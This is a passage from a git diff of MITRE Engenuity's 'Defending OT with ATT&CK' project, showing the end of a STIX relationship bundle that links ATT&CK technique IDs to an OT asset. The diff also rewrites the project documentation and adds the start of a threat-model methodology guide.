"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842961", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51c338f8-b206-4a45-ae04-01f033b63319", "created": "2024-07-01T10:37:15.842968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842970", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb5e18d7-71ce-435c-943e-911d4a1189f3", "created": "2024-07-01T10:37:15.842976", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842978", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fa79f85a-9e63-44e7-8e80-eee4de3d822b", "created": "2024-07-01T10:37:15.842985", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842986", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--01645046-6b67-437d-9202-da07d3f8faed", "created": "2024-07-01T10:37:15.842993", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842995", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f3558d6-28ce-4722-9f04-a8fbca7b4e5a", "created": "2024-07-01T10:37:15.843002", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843004", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--493befe1-ae2a-41b3-a55f-5396c0603e97", "created": "2024-07-01T10:37:15.843011", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843012", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81851eac-27d0-4b43-8ded-f939a5da12a1", "created": "2024-07-01T10:37:15.843019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--daaf5a1e-8ff3-4f80-ad0c-4b94319d398b", "created": "2024-07-01T10:37:15.843027", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843029", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61a09c75-795f-4717-9948-aef701069624", "created": "2024-07-01T10:37:15.843036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b35f5fa1-98a8-45b9-8cc6-5534ac238ec6", "created": "2024-07-01T10:37:15.843045", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843046", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f4307e3-ecda-45db-a614-19f378c997b8", "created": "2024-07-01T10:37:15.843053", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843055", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbe6f3b9-ff37-44ec-837c-40e124dcf622", "created": "2024-07-01T10:37:15.843062", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843063", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f8b5ac1-96c7-4bef-8d08-a02bc4970627", "created": "2024-07-01T10:37:15.843070", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843072", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adc9eacd-6ffb-4ff1-99ee-5382805d4f47", "created": "2024-07-01T10:37:15.843079", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843081", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--744c4be9-3d5f-442f-9b50-737522544c72", "created": "2024-07-01T10:37:15.843087", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843089", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--660e629c-ddc0-4905-a958-200eeb02f0ef", "created": "2024-07-01T10:37:15.843096", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843097", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d12550fa-5fd4-4042-b37d-0ab71424f47c", "created": "2024-07-01T10:37:15.843118", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843120", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--742a7b45-230a-4e04-985b-5b35d04eebf5", "created": "2024-07-01T10:37:15.843126", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843128", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--93cf0565-bff3-4f28-b56d-b4d49c914385", "created": "2024-07-01T10:37:15.843134", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843136", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c742613-e798-43b4-bb8d-7689cf3e8f2d", "created": "2024-07-01T10:37:15.843143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6bfdcb9a-544f-4fbf-8651-e5f24fea5ece", "created": "2024-07-01T10:37:15.843151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9eb07e4e-d92e-4fea-80fe-bf3ef6ca0a6d", "created": "2024-07-01T10:37:15.843159", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843161", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d54c0914-5147-4272-b0e1-043465762b36", "created": "2024-07-01T10:37:15.843168", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843169", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--345cf92a-2f29-4057-b9fe-1881b925d227", "created": "2024-07-01T10:37:15.843176", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843178", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d61b6779-217d-423f-ae21-63dea2657f97", "created": "2024-07-01T10:37:15.843185", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843187", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2d73a19-0b15-40c5-8fb7-b92f4fe1e32e", "created": "2024-07-01T10:37:15.843194", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843196", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a065d4db-da14-4a3b-b69c-607e590f44e9", "created": "2024-07-01T10:37:15.843202", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843204", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a0dc4fe-0584-4cec-a7b6-4f8f97aea91c", "created": "2024-07-01T10:37:15.843211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843212", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--16f84986-1267-423f-86f0-14facb9f50e0", "created": "2024-07-01T10:37:15.843219", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843221", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ac9626a-3987-4949-96f7-aa565ad153be", "created": "2024-07-01T10:37:15.843227", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843229", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f38eb53-400f-47a8-9cf9-91f3afa896a2", "created": "2024-07-01T10:37:15.843235", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843237", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--568bfbd8-07e6-401d-8ae0-3da483187fba", "created": "2024-07-01T10:37:15.843244", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843245", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39b3bdae-d1f5-4c0f-8ed8-a4bf3800e419", "created": "2024-07-01T10:37:15.843252", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843254", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9a2f1f9-bbb9-474d-935d-6fb4cbac5bcd", "created": "2024-07-01T10:37:15.843260", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.843262", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}]} \ No newline at end of file diff --git a/docs/index.rst b/docs/index.rst index f7200e2..c6095d4 100644 --- a/docs/index.rst +++ b/docs/index.rst @@ -1,25 +1,36 @@ -Defending OT with ATT&CK |version| -================================== - -.. TODO Enter a one paragraph summary here. - -Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor -incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud -exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure -dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. -Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt -mollit anim id est laborum. +Defending Operational Technology (OT) with ATT&CK +================================================= + +Defending OT with ATT&CK provides a customized collection of `MITRE ATT&CK® `_ techniques +tailored to the attack surface and threat model for OT environments. The collection of +threats contained in the ATT&CK knowledgebase, including historical attacks against OT, +are used to define a reference architecture and technology domains of interest for OT. +The resultant collection can be used by organizations that use OT to evaluate and employ +security controls for real-world adversary behaviors. + +This project is created and maintained by `MITRE Engenuity Center for Threat-Informed Defense (Center) `_ +and is funded by our research participants, in futherance of our mission to advance the state +of the art and the state of the practice in threat-informed defense globally. This work builds upon the +Center's `Defending IaaS with ATT&CK `_ project by +by using the methodology and tooling created under that project as a basis, and provides another collection +of resources cyber defenders can use to understand and make threat-informed decisions for techniques that +could be used within an IT/OT hybrid architecture and environment. .. toctree:: :maxdepth: 2 :caption: Contents - introduction + overview + architecture + collection + methodology + use cases + exercise Notice ------ -© |copyright_years| MITRE Engenuity. Approved for public release. Document number(s) +© 2024 MITRE Engenuity. Approved for public release. Document number(s) |prs_numbers|. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this diff --git a/docs/introduction.rst b/docs/introduction.rst deleted file mode 100644 index 9126eaf..0000000 --- a/docs/introduction.rst +++ /dev/null @@ -1,13 +0,0 @@ -Introduction -============ - -.. TODO Add any chapters you wish as separate *.rst files that are referenced in the - index.rst. This file can contain an introduction if you want, or delete it and - create other chapters. - -Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor -incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud -exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure -dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. -Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt -mollit anim id est laborum. diff --git a/docs/methodology.rst b/docs/methodology.rst new file mode 100644 index 0000000..603a6a2 --- /dev/null +++ b/docs/methodology.rst @@ -0,0 +1,187 @@ +Threat Model Methodology +======================== + +This project used a structured approach to ensure a thorough analysis and documentation of +potential adversarial techniques, tailored to the specific assets and architecture of the +organization. By following these steps, organizations can effectively delineate their attack +surface, compile relevant threat intelligence, apply rigorous selection criteria, and build +a comprehensive threat collection to bolster their cybersecurity defenses. + +Step 1. Identify the attack surface. +------------------------------------ + +The first step is to identify the attack surface. This includes the system components that are in +scope, the range of technologies comprising the system, and the user archetypes involved in the system. +Delineate the security boundary, especially in vendor scenarios where responsibilities may be shared +with or delegated to a partner organization. Determine the relevant technologies where a threat actor can +impact operations and generate a reference architecture that depicts technologies in scope for a hybrid +IT/OT system. For Defending OT with ATT&CK's threat collection, the attack surface is compromised of all the +assets selected for the :doc:`architecture` table. + +**Objective:** Define the system components, technological assets, and user archetypes that +form the architecture's attack surface. + +**Actions:** + +* Identify System Components and Enumerate Technologies + + * Determine the scope of the systems, including enterprise IT platforms and ICS, by listing the assets and technologies involved (e.g., Hardware, Network, Operating Systems, Applications, Cloud services, Containers, etc.). + +* Categorize Reference Architecture Assets + + * Categorize total assets, identifying key assets with known adversarial risks from IT/OT perspectives. + +**Example Assets:** + +* Servers and Endpoints: Control Server, Programmable Logic Controller, Application Server +* Identity and Access Management: Azure AD/Entra ID +* Networking Components: Routers, Switches, Firewalls +* ICS Assets: Human-Machine Interface, Safety Controllers, Data Gateway + +To learn more about assets, visit :doc:`architecture` + +Step 2. Compile source information. +----------------------------------- + +The second step is to gather information resources and applicable cyber threat intelligence +including ATT&CK adversary behavior used to target the identified IT/OT systems. The adversarial +techniques from relevant cyber threat intelligence (CTI) sources are combined to form a list of +candidates for the threat collection, yet some of these techniques will not be applicable to all +assets. To create a broad picture of all feasible adversarial techniques that could affect the +architecture, it is important to consult multiple sources to identify key CTI and datasets from +the ATT&CK framework: + +* Industrial Control Systems +* Linux +* Cloud (IaaS, SaaS, Azure, AWS, GCP, O365) +* Containers +* Windows +* Azure AD +* Network + +**Objective:** Gather relevant cyber threat intelligence (CTI) sources to identify potential 